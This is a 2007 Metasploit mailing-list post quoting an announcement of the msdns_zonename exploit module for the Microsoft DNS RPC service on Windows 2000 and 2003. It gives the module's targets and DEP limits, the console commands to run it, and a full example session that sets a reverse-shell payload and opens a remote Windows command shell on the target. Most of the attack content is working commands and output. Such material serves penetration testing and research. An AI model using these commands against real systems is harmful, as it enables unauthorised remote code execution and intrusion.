Metasploit mailing list archives
Exploiting the Microsoft DNS RPC service
From: giorgio.casali at gmail.com (Giorgio Casali)
Date: Tue, 17 Apr 2007 17:11:55 +0200
Hi, is it possible to have it for the Italian version? Thanks 2007/4/16, H D Moore <hdm at metasploit.com>:
The exploit module has been merged to stable, use 'Online Update' or 'svn
update' to grab it. The module's default target will exploit Windows 2000
SP0-SP4 and Windows 2003 SP0-SP2.
All targets are designed for the English locale. If you have a non-English
system, submit targets.
The Windows 2003 SP0 target may not be reliable.
The Windows 2003 SP1-SP2 targets will only work if hardware DEP is not in
use. We use the SEH overwrite method for all targets and the /GS stack
prevention means we will not be able to use standard hardware DEP bypass
techniques (return to NTDLL to disable NX).
The RPORT option defaults to '0' and will contact the endpoint mapper of
the target system in order to determine the real RPC port at runtime.
This saves a step, but it does mean that one of port 135 or 593 needs to
be accessible on the target. If you are attacking a system with only
ports > 1025 allowed through the firewall, you will need to locate the
RPC service and set RPORT manually.
To use the module, open the console interface, and run:
msf> use exploit/windows/dcerpc/msdns_zonename
msf exploit(msdns_zonename) >
msf exploit(msdns_zonename) > set PAYLOAD <your favorite payload>
msf exploit(msdns_zonename) > set <payload options>
msf exploit(msdns_zonename) > set RHOST <target>
msf exploit(msdns_zonename) > exploit
-- example --
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ msf v3.0
+ -- --=[ 184 exploits - 104 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 33 aux
msf > use exploit/windows/dcerpc/msdns_zonename
msf exploit(msdns_zonename) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(msdns_zonename) > set LHOST 192.168.0.127
LHOST => 192.168.0.127
msf exploit(msdns_zonename) > set LPORT 4444
LPORT => 4444
msf exploit(msdns_zonename) > set RHOST 172.16.233.128
RHOST => 172.16.233.128
msf exploit(msdns_zonename) > exploit
[*] Started reverse handler
[*] Connecting to the endpoint mapper service...
[*] Discovered Microsoft DNS Server RPC service on port 1356
[*] Trying target Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English...
[*] Binding to
50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128
[0] ...
[*] Bound to
50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128
[0] ...
[*] Sending exploit...
[*] Error: no response from dcerpc service
[*] Command shell session 1 opened (192.168.0.127:4444 ->
192.168.0.127:45196)
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
c:\>
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070417/63720aef/attachment.htm>
Current thread:
- Exploiting the Microsoft DNS RPC service H D Moore (Apr 15)
- Exploiting the Microsoft DNS RPC service Giorgio Casali (Apr 17)
- Exploiting the Microsoft DNS RPC service diaul (Apr 18)
- Exploiting the Microsoft DNS RPC service Fabrice MOURRON (Apr 18)
- Exploiting the Microsoft DNS RPC service fab at revhosts.net (Apr 19)
- Exploiting the Microsoft DNS RPC service Fabien Perigaud (Apr 19)
- Exploiting the Microsoft DNS RPC service diaul (Apr 18)
- Exploiting the Microsoft DNS RPC service Giorgio Casali (Apr 17)